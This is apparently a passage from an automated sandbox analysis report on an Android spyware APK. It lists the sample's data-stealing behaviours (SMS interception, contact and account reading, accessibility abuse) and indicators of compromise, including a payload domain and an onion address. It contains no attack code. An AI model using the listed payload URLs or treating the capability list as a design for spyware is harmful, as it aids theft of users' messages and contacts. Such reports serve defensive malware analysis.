Stealing of Sensitive Information:

barindex
Sets itself as the default SMS applicationShow sources
Source: Lru/delivery/collapse/a;->a([B)Ljava/lang/String;Method string: "android.provider.Telephony.SMS_DELIVER"
Source: Lx/x/x/a/a;->a(Landroid/content/Context;)VMethod string: "android.provider.Telephony.SMS_DELIVER"
Uses accessibility services (likely to control other applications)Show sources
Source: ru.delivery.collapse.Bless;->a:12API Call: android.view.accessibility.AccessibilityNodeInfo.findAccessibilityNodeInfosByText
Has permission to read contactsShow sources
Source: submitted apkRequest permission: android.permission.READ_CONTACTS
Has permission to read the phones state (phone number, device IDs, active call ect.)Show sources
Source: submitted apkRequest permission: android.permission.READ_PHONE_STATE
Has permission to receive SMS in the backgroundShow sources
Source: submitted apkRequest permission: android.permission.RECEIVE_SMS
Monitors incoming Phone callsShow sources
Source: ru.delivery.collapse.SteelRegistered receiver: android.intent.action.PHONE_STATE
Monitors incoming SMSShow sources
Source: ru.delivery.collapse.ExplodeRegistered receiver: android.provider.Telephony.SMS_RECEIVED
Queries a list of installed applicationsShow sources
Source: x.x.x.b;->c:93API Call: android.content.pm.PackageManager.getInstalledApplications
Source: x.x.x.a.a;-><init>:46API Call: android.content.pm.PackageManager.queryIntentActivities
Queries phone contact informationShow sources
Source: ru.delivery.collapse.b;->d:65Field access: android.provider.ContactsContract$CommonDataKinds$Phone.CONTENT_URI
Source: x.x.x.b;->d:128Field access: android.provider.ContactsContract$CommonDataKinds$Phone.CONTENT_URI
Source: x.x.x.b;->e:178Field access: android.provider.ContactsContract$CommonDataKinds$Phone.CONTENT_URI
Queries stored mail and application accounts (e.g. Gmail or Whatsup)Show sources
Source: com.google.android.gms.e.a.a;->a:51API Call: android.accounts.Account.name
Sample Distance (10 = nearest)
10 9 8 7 6 5 4 3 2 1
Samplename Analysis ID SHA256 Similarity

Antivirus Detection

Initial Sample

SourceDetectionScannerLabelLink
AS4FMH9hKE16%virustotalBrowse

Dropped Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
cdn1e699bdc.com3%virustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://cdn1e699bdc.com/classes.dex0%virustotalBrowse
http://cdn1e699bdc.com/classes.dex0%Avira URL Cloudsafe
http://cdn1e699bdc.com/3%virustotalBrowse
http://cdn1e699bdc.com/0%Avira URL Cloudsafe
http://cdn1e699bdc.com/tor.zip0%virustotalBrowse
http://cdn1e699bdc.com/tor.zip0%Avira URL Cloudsafe
http://un6kqz7yotjtuqwi.onion0%Avira URL Cloudsafe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
172.217.168.68http://reimagetech.be?7L=UPmA1TBOQJCTRQDWZGFSCQY0CQiGet hashmaliciousBrowse
  • www.google.com/afs/ads/i/iframe.html
.exeGet hashmaliciousBrowse
  • www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=apple.com+e-mail&num=100
1cwy@cmmai.exeGet hashmaliciousBrowse
  • www.google.com/sorry/index?continue=http://www.google.com/search%3Fhl%3Den%26ie%3DUTF-8%26oe%3DUTF-8%26q%3Demail%2Baol.com%26num%3D100&hl=en&q=EgSwCmKEGPrxutoFIhkA8aeDS1Lfubtein6nVWahwipquD0_Ng8eMgFy
9anything.com.html .exeGet hashmaliciousBrowse
  • www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=contact+e-mail+theriver.com&num=100
system.ps1Get hashmaliciousBrowse
  • www.google.com/
.exeGet hashmaliciousBrowse
  • www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=apple.com+mailto&num=100
1transcrip.exeGet hashmaliciousBrowse
  • www.google.com/sorry/index?continue=http://www.google.com/search%3Fhl%3Den%26ie%3DUTF-8%26oe%3DUTF-8%26q%3Dinternet.com%2Be-mail%26num%3D50&hl=en&q=EgSwCmKJGJW14NoFIhkA8aeDS09NnFcnwbjK8dqCa2NixDeVkrmDMgFy
21transcript.exeGet hashmaliciousBrowse
  • www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=mail+oss.software.ibm.com&num=100
Zy0M1WxyF2.exeGet hashmaliciousBrowse
  • www.google.com/
69proshikane.exeGet hashmaliciousBrowse
  • www.google.com/sorry/index?continue=http://www.google.com/search%3Fhl%3Den%26ie%3DUTF-8%26oe%3DUTF-8%26q%3Dcontact%2Bemail%2Bus.ibm.com%26num%3D100&hl=en&q=EgSwCmKLGPPY_9oFIhkA8aeDS42k8X_U-YlFSBij2DhC6jxLVWwNMgFy
108.177.127.188AVPlayer_085650.apkGet hashmaliciousBrowse
    dqHrTsXEK0.apkGet hashmaliciousBrowse
      XEUNVKSQH4Get hashmaliciousBrowse
        dronefly.apkGet hashmaliciousBrowse
          Wn4s99YjZz.MRGGet hashmaliciousBrowse
            rootme1.apkGet hashmaliciousBrowse
              com.skt.skaf.OA00026910_2018-12-17.apkGet hashmaliciousBrowse
                esE036YtqWGet hashmaliciousBrowse
                  8KP5u03bC6Get hashmaliciousBrowse
                    m36EyGg6k4Get hashmaliciousBrowse
                      d2vPNAZhAWGet hashmaliciousBrowse
                        ZyuL16KGfvGet hashmaliciousBrowse
                          Download_Files.apkGet hashmaliciousBrowse
                            o1yZY5rMU4Get hashmaliciousBrowse
                              KW34anYcOZ.apkGet hashmaliciousBrowse
                                GlanceLove_v7.1_apkpure.com.apkGet hashmaliciousBrowse
                                  80E14BUx7D.MRGGet hashmaliciousBrowse
                                    W1qdeOfq53.MRGGet hashmaliciousBrowse
                                      base.apkGet hashmaliciousBrowse
                                        WvYm9VUXRxGet hashmaliciousBrowse

                                          Domains

                                          No context

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          unknownInvoice0186.pdfGet hashmaliciousBrowse
                                          • 192.168.0.40
                                          P_2038402.xlsxGet hashmaliciousBrowse
                                          • 192.168.0.44
                                          bad.pdfGet hashmaliciousBrowse
                                          • 192.168.0.44
                                          RFQ.pdfGet hashmaliciousBrowse
                                          • 192.168.0.44
                                          100323.pdfGet hashmaliciousBrowse
                                          • 192.168.0.44
                                          Copy.pdfGet hashmaliciousBrowse
                                          • 127.0.0.1
                                          2.exeGet hashmaliciousBrowse
                                          • 192.168.0.40
                                          UPPB502981.docGet hashmaliciousBrowse
                                          • 192.168.0.44
                                          Adm_Boleto.via2.comGet hashmaliciousBrowse
                                          • 192.168.0.40
                                          00ECF4AD.exeGet hashmaliciousBrowse
                                          • 192.168.0.40
                                          PDF_100987464500.exeGet hashmaliciousBrowse
                                          • 192.168.0.40
                                          filedata.exeGet hashmaliciousBrowse
                                          • 192.168.0.40
                                          .exeGet hashmaliciousBrowse
                                          • 192.168.1.60
                                          33redacted@threatwave.comGet hashmaliciousBrowse
                                          • 192.168.1.71
                                          unknownInvoice0186.pdfGet hashmaliciousBrowse
                                          • 192.168.0.40
                                          P_2038402.xlsxGet hashmaliciousBrowse
                                          • 192.168.0.44
                                          bad.pdfGet hashmaliciousBrowse
                                          • 192.168.0.44
                                          RFQ.pdfGet hashmaliciousBrowse
                                          • 192.168.0.44
                                          100323.pdfGet hashmaliciousBrowse
                                          • 192.168.0.44
                                          Copy.pdfGet hashmaliciousBrowse
                                          • 127.0.0.1
                                          2.exeGet hashmaliciousBrowse
                                          • 192.168.0.40
                                          UPPB502981.docGet hashmaliciousBrowse
                                          • 192.168.0.44
                                          Adm_Boleto.via2.comGet hashmaliciousBrowse
                                          • 192.168.0.40
                                          00ECF4AD.exeGet hashmaliciousBrowse
                                          • 192.168.0.40
                                          PDF_100987464500.exeGet hashmaliciousBrowse
                                          • 192.168.0.40
                                          filedata.exeGet hashmaliciousBrowse
                                          • 192.168.0.40
                                          .exeGet hashmaliciousBrowse
                                          • 192.168.1.60
                                          33redacted@threatwave.comGet hashmaliciousBrowse
                                          • 192.168.1.71

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Screenshots

                                          Thumbnails

                                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.